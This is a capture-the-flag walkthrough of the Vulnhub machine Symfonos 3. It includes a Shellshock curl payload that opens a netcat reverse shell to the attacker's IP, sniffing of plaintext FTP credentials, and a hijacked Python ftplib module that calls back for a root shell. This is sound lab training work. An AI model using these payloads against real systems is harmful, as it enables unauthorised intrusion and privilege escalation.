Symfonos 3
Symfonos 3 Vulnhub Walkthrough
Enumeration
Nmap
nmap -sC -sV -oA nmap/sym3 192.168.1.114
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 02:39 EDT
Nmap scan report for 192.168.1.114
Host is up (0.00016s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5b
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 cd:64:72:76:80:51:7b:a8:c7:fd:b2:66:fa:b6:98:0c (RSA)
| 256 74:e5:9a:5a:4c:16:90:ca:d8:f7:c7:78:e7:5a:86:81 (ECDSA)
|_ 256 3c:e4:0b:b9:db:bf:01:8a:b7:9c:42:bc:cb:1e:41:6b (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:DA:E2:26 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds
Let's put the IP to the browser

And we got this at the inspect elements

So, I decided to use dirb and gobuster
dirb & gobuster
dirb http://192.168.1.114/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue May 26 02:42:28 2020
URL_BASE: http://192.168.1.114/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.114/ ----
+ http://192.168.1.114/cgi-bin/ (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.1.114/gate/
+ http://192.168.1.114/index.html (CODE:200|SIZE:241)
+ http://192.168.1.114/server-status (CODE:403|SIZE:278)
---- Entering directory: http://192.168.1.114/gate/ ----
+ http://192.168.1.114/gate/index.html (CODE:200|SIZE:202)
-----------------
END_TIME: Tue May 26 02:42:38 2020
DOWNLOADED: 9224 - FOUND: 4
We got a directory called gate

Nothing seems to be interesting, so let's continue to enumerate
I can't enumerate anything from dirb so I changed to gobuster
gobuster dir -u http://192.168.1.114/gate/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.114/gate/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/05/26 02:44:57 Starting gobuster
===============================================================
/cerberus (Status: 301)
===============================================================
2020/05/26 02:45:39 Finished
===============================================================
We got a directory called /cerberus
Further enumeration I got /tartarus
and I got this

At the inspect elements, it says it may be misleading

It seems that we might gone into a rabbit hole. So let's back to square one
I use dirbuster to enumerate the URL again

Then, when we enumerate, we got the underworld directory under cgi-bbin

Lets navigate to /cgi-bin/underworld

Got this..hmmm
After some research, found out that at the Pentesterlab, the exploit is called shellshock
Exploitation
Reverse Shell
We can get a reverse shell by using this command
curl -A "() { :; }; /bin/bash -c 'nc 192.168.1.117 443 -e /bin/sh'" http://192.168.1.118/cgi-bin/underworld
And we need to set up a listener at out machine
nc -nlvp 443

Got a reverse shell. Then we can type the python code to spawn a proper shell
python -c 'import pty; pty.spawn("/bin/bash")'
After that I use tcpdump
to grab the ftp server network and store it at /tmp directory.
tcpdump -w ftplog.pcap -i lo
Then we can use nc
to transfer the file to our machine to analyse it
After that we can use wireshark to analyse it.
We can filter it by tcp.port == 21
and then we right click and choose follow TCP stream and then we can see this

We got the password (PTpZTfU4vxgzvRBE) and username for user hades
We can su
to the user hades

Privilege Escalation
After that we run the pspy
again
Then we got this

We know that there is a file running at /opt/ftpclient
that can run as root.

But when we go to the /opt/ftpclient
we can see that we have no permission to edit the files.
Python Library Hijacking
After researching and asking the author of this machine cause I didn't know how it works, it is python library hijacking.
python -c 'import sys; print "\n".join(sys.path)'
Using this command will show the path that all the directories that python will look for to import the library according to the directories.

As we can see here there are bunch of folders

If we cat
into the ftpclient.py
that is under /opt/ftpclient
, we can see that the file is importing a library called ftplib
We navigate to /usr/lib/python2.7
Then we can type ls -la | grep ftplib

We can see that ftplib.py can be modify by the user that is under group gods
which can be edited by hades.
We first rename the file to become a backup file
Then we can nano ftplib.py to create a new file to replace the old one.
Type in these code to get a reverse shell
import os
import sys
os.system("nc -e /bin/bash 192.168.1.116 4444")
Then save the file.
Go to our machine to set up a listener
nc -nlvp 4444
After waiting for 1 minute, we get a reverse shell back

Then type the python code to get a proper shell
Then, we got root !

Navigate to /root
to get the flag.txt

Congratulation !
Last updated
Was this helpful?